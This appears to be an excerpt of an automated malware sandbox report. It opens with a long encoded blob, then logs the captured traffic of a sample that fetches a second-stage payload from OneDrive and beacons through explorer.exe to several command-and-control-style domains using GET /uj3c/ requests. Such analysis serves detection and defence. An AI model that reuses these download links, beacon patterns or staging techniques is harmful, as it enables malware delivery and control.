UBwGRy00q6-R3dnC8AlJHlTZdumgpUwZnZmaLh6DfKUWjTdqCXYHk~vJOVttMfPDmOnlXaFMQXxQTxcn7T62MQ5aaw4ewnRk9lrcslWQey973Mykx(lvdshtGvpI8cAM5VtvqvdGaJhjy2C1RERnQEwfwJQs9hX(nVYPXCop3LQKd1cTRfXQuynLtPySyK42nZuPDqo3foQZ9W6EyQtORDonzVbj7aJaShK9Syq0yloJRdWA3slB6xIFxoDuJbnH9VUCjx9jTWrfHkRzKV_PIWCxGRh3imxQS4Y2Rjz6sc22VCgki9JVSEF~bq1Aypxvlw0h7(lHqrvW5eMjHbc(SfDy9JSm1japP35L4Tqv01S9e5w9_XcFwBPsY3JMcKB2VsvdNZVY33Tgx(vi2wuKcSqNVi0fi(Q3UGhymrWEsA2nhJGSCZDzYgcjraEzhw09pWUPYMnVNGNmb68TsL1BFmyjPXSjFLN(Pd9Z8blZmYezKn9BG~RUEDaAiiU5Hv5qI(VhVZZYl(rhwttSE8b(Wx6vpeoVqwcdgDKJ7fYLPYKW3HZsM1QF0mIHS867GwJiQZAXcAndm6JGYWNBjh8X9ZvgIM6RROwuy0anRm2mRyIQYvit2pFnwUHgkpSCqsXenvOI9EXEtpaUt5oGvvHuIi0qgTj8Xl1C4(A9Klovv3sGYwDu_Vt1ho_Ww3B(MKYCgDYlF(Ilio1ZhoGHjzKHHjr7aQ_b8AvJnhPhbur2bWUPiy9IYXtxYpnEnQtFVUjK1jzOoO5SlGeMrs5P81ZPjd0kT0C5_YRe7kvkGFKw6V2U2GUAqdGzFh8yq1qLiAT5fDOXjwZAQb4XHMwuRoOp4UxDZe8M8A37StE1g9ZfAD4ZwtO4IpYIAz15J4P8YDp07R2edlmPZe2SB0h90rmZvbzJt8Wj7po(Ktng9VBBhaLfq4itHyDW3jyokuKRpbpoM7OY9PaYeBbUkvg60L35zltInehf0cBSFrSgfU1yCqo8DGel9pWeekZfbx7wQ71h5rjrouF7yy0qrlTuvOKBd03acoMOyUG9lSA5MWA~rz5C9v02mHlUKVDWvhbJXK-vPi3b9qUMohBkx(ROjazoGnCyvNSzJvGeZU1AwxgWfuRnrfgtJYCYO(JWOTcoOOiJEs0BomKFX3v4CC9dRw1nrk_FR4T~z(PxknSArkqDY3qUWYhxLgiabKCkcFU7xYDZWaadxgky2zdS9KsJFRF1uXxdH4mIKkAHrZ8O_KWS2cT0zQe9iljn_8ZhjhH~zZkBmKQp0lnh_pds_jYKFvEuH5D49wupyqe6uNgfap8y32ZC1ach57n2nEcZ9USq5142wjNl-eXYk8VFw24ysGcvkYTF06C3CT2pJ9SEWLDazMZrwbsc85WQzXu0jyaSOW6j09yQes69l6JVr1JCGgz634rRaN12SFvlb48BLYT7hxtd4axf0(Et34FdmCxuI~btlU9FT~mtuPkIQlAHjQUtcFDVdKWJD1YXScU7LhCcOkGPeHb3gG8P08w5zvx9Zrw0xBnla8uspz8UdQgDSoGHk~pvWc0dsFMzfzcxYvygAVISzzEYFEX5oHyFsU85PekVtu6J0nuqM8PFeXsnVPXd4IThhVAm7V9X2o4CE02zgNKErEz8RldnVvHSzoj~h7VOX58mZxg8uSDtX1WDcqyaol7zoQDOwgLcPhbnHWgN7lOvoNm9a5AiR6ZQuO4BQFli0Xj3Aj3LSIrf0IVgzy2HriIjKhFUmFUUmp48cICjhkHDRCBAhc3As6WCDt0~klIuN9HGu9YIbZqmnURHaViR-gNSPzfhUnTbzO7Xgn_IwpMtGiNuQlqFnwq7BfNiefmVYEpn8nCs14vU4TKXgqcyn3WDxkl4vJDBcpiWZ0YC16-KD52yQGBmwPygrxytAI0VKfpZs8E(9o63map6lD83XttLN6zJhEynC~S8YD5bWVoHYr4i0iQLvf95weLAgMqS4xOY6LHwJ1ESy5npmDvXNAFw_3N15zkXOk1IZDCXPjkjElxrt~ohYyY(c1iwFcIF8MR0EQFzzo0TdcBqJmqU7VvTF2Clght6CpRwJ5UDkUb~eNOgblcZEeS9swRVHlqHONfbuAq(vy7At39Ct(xmOILgcKMAEjRs5~udTbHUuV3C7mjquiCbB~2bxiaweqSKODLGNlyuDip0K(Y3mMLaQaRVTcrQar-ht6nfBCb1DFFOKcjmlGFukNXMJD7Q2o_wvIASPImsAOakO5sPFmD4RAdayeX2XoYQ3Xw4rmqpZj3cBPqzqWgsWQyYew6~Fy7QbI3luybtFdrIImFRWTWoiKIilu8nMDZ1X(eMlCMUQYjKQuu(zrtKWw81nX6q55u~pbm(clDUdZ4J1ahNjhGZfo6Q80J42eMrLIhM_6zK3U81xzThInbYwSSE1ZZWR5wEYPcfU2icBOrrtMWUYP7XmJ6elrtSddR5CLJauLogjpW2lG6UA8I~A1rgeVTk6nl3KDHgPFaz3mfm_fqK4xNxA~83caeE-J6IQCBRgJ3XhJjVo0DTa(kS9Ry08GMQDoSU3wPzV5uzJhR4yXhkFmUpP~8hgz6(cC3GTa1~PpAPf9CY5oZWDQcEbYHQzkjaFbzyOgYgoQb434ktcNbi1uLRuhNqIl1h_OqeXs6vt~d3dVWOVLv(CZgor60CUd2Jcz9h6mjbmdcETMYeCDJuqN9tTaohFm7HbBuMHGc07Z1a_ao6Y8ygftiGUzR3eJYoNXGl9hVEx8G2U7rX7j19zwLrXLDWLR226~GV-6LPG9CQPWUFq8Evo35105w4G~r11DYGubtnv50BGTs8K59B7uVTAMxNN6RWy0rEWTdyCyDD_~0~AWIKEKH2BGZHAD2eujp18lxXVd68Z7F


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                19192.168.2.34986138.54.163.5780C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:15:40.535789013 CEST10176OUTGET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.nomaxdic.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:15:40.744405031 CEST10185INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 08 Aug 2022 18:15:31 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 1776
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 bb c6 c9 bd cf da bc cd bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26 23 32 30 33 31 36 3b 26 23 32 39 32 33 33 3b 26 23 37 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26 23 32 30 33 31 36 3b 26 23 32 39 32 33 33 3b 26 23 37 32 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26
                                                                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&#20316;&#29233;&#72;</title><meta name="keywords" content="&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&#20316;&#29233;&#72;" /><meta name="description" content="&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.34974613.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                3192.168.2.34974813.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                4192.168.2.34974913.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                5192.168.2.34975113.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                6192.168.2.349822209.17.116.16380C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:14:13.788683891 CEST10015OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1
                                                                                                Host: www.meigsbuilds.online
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:13.910449028 CEST10015INHTTP/1.1 400 Bad Request
                                                                                                Server: openresty/1.19.9.1
                                                                                                Date: Mon, 08 Aug 2022 18:14:13 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 163
                                                                                                Connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                7192.168.2.34982381.169.145.15880C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:14:18.982198954 CEST10016OUTGET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.naturathome.info
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:19.002310991 CEST10017INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 08 Aug 2022 18:14:18 GMT
                                                                                                Server: Apache/2.4.54 (Unix)
                                                                                                Location: https://natur4home.de/uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt
                                                                                                Content-Length: 330
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 61 74 75 72 34 68 6f 6d 65 2e 64 65 2f 75 6a 33 63 2f 3f 72 34 53 30 50 3d 44 5a 2b 7a 31 4a 57 57 46 4b 30 41 30 74 56 52 58 6c 61 70 67 6e 2f 36 61 31 66 6f 37 35 34 70 36 73 30 76 52 69 67 66 6d 6c 32 65 65 7a 39 5a 61 62 79 73 39 49 65 53 44 66 4f 47 4c 65 4d 37 69 48 73 6a 26 61 6d 70 3b 61 4e 36 38 3d 58 50 55 74 75 72 4b 78 49 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://natur4home.de/uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&amp;aN68=XPUturKxIt">here</a>.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                8192.168.2.34983934.102.136.18080C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:14:24.056804895 CEST10053OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1
                                                                                                Host: www.nutricognition.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Aug 8, 2022 20:14:24.174422979 CEST10054INHTTP/1.1 403 Forbidden
                                                                                                Server: openresty
                                                                                                Date: Mon, 08 Aug 2022 18:14:24 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 291
                                                                                                ETag: "62f13bce-123"
                                                                                                Via: 1.1 google
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                9192.168.2.349849198.54.117.21880C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Aug 8, 2022 20:14:29.416650057 CEST10083OUTGET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1
                                                                                                Host: www.designgamagazine.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.34972813.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2022-08-08 18:12:07 UTC0OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent: lVali
                                                                                                Host: onedrive.live.com
                                                                                                2022-08-08 18:12:07 UTC0INHTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4mH5njK3Y1QtIbimJzFbCrE_JDXEnExbjbVxBDZIFjebXmw79EaJlBUAJQg8a2lSk0jKy-tPU0chMYqSM0jXi-8cGNjx2a1GBrDjquvitMbc8eWJHco5I2rBTPI-ScXgjnnudSH65QTD1_9Msg8MkBuR4z6AMBXpFPY3dC7-t0HPCsGu7SJi2G7CfkzInKuP5-ICh-FkN7O4Kfuxs8jByCVg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:07 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:07 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD00155D99AC6F
                                                                                                X-ODWebServer: eastus1-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 8F105B9B80CB4A57B880E6EC8CF60156 Ref B: VIEEDGE2220 Ref C: 2022-08-08T18:12:07Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:07 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.34973713.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2022-08-08 18:12:08 UTC1OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent:
                                                                                                Host: onedrive.live.com
                                                                                                Cookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
                                                                                                2022-08-08 18:12:09 UTC1INHTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4m2hcEcRyV2JhQQBZaqRIjzQw6g-TKpbJPNuPamP3d_ftn7KVVKB28wfCFbzizb3EScW4XZrjxDHVU2nlolu0KT6p2C5WkCpqMaIKZEKYwJ0K8_25tYVzGHqkoOILcSjWIrc9QmBIPZzNFMIOwUZGN1um-6-LbSlR6g_5dmytuWc52jf4STIO2D4ciaxKqk4X3i3LdPJKMJbYct39TynP62g/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:Ue8Sgml52og=:2CbmHhTEK6PNZmJKCqUp84cYqU1uNUkruQuHtUevA0c=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=2; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:08 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:09 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD00155D5E899F
                                                                                                X-ODWebServer: canadaeast0-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 8B9493EEB3144B558088DD3320DF0EC7 Ref B: VIEEDGE2913 Ref C: 2022-08-08T18:12:08Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:08 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.34974613.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2022-08-08 18:12:29 UTC2OUTGET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1
                                                                                                User-Agent: lVali
                                                                                                Host: 2q5ira.ph.files.1drv.com
                                                                                                Connection: Keep-Alive
                                                                                                2022-08-08 18:12:29 UTC2INHTTP/1.1 200 OK
                                                                                                Cache-Control: public
                                                                                                Content-Length: 176597
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Location: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBoD_r1DEwQOnzL8alhWdzoV4dXTbQnAPBlGdisOZ40oBFXSHtnmRSXHNJEkWa40KHBIN5wJovWCBSCOoWJ36AFQtwVXuVnLiElslGy8b4QEVXKeyDO-kSqSIBYurExcgo
                                                                                                Expires: Sun, 06 Nov 2022 18:12:29 GMT
                                                                                                Last-Modified: Sun, 07 Aug 2022 23:08:30 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: E0CF7F9E6AAF27EF!235.2
                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                X-MSNSERVER: PH2PPF565EA4797
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                MS-CV: b4RE8hOGWU2mJZDv2ER/Uw.0
                                                                                                X-SqlDataOrigin: S
                                                                                                CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITIzNS4yNTc
                                                                                                X-PreAuthInfo: rv;poba;
                                                                                                Content-Disposition: attachment; filename="Jwjxmakrvkwfuijrnbpqlslhsyeopao"
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-StreamOrigin: X
                                                                                                X-AsmVersion: UNKNOWN; 19.966.720.2006
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 21FDDC2B2D9B44A58900E0EFD1C951D0 Ref B: VIEEDGE1416 Ref C: 2022-08-08T18:12:29Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:29 GMT
                                                                                                Connection: close
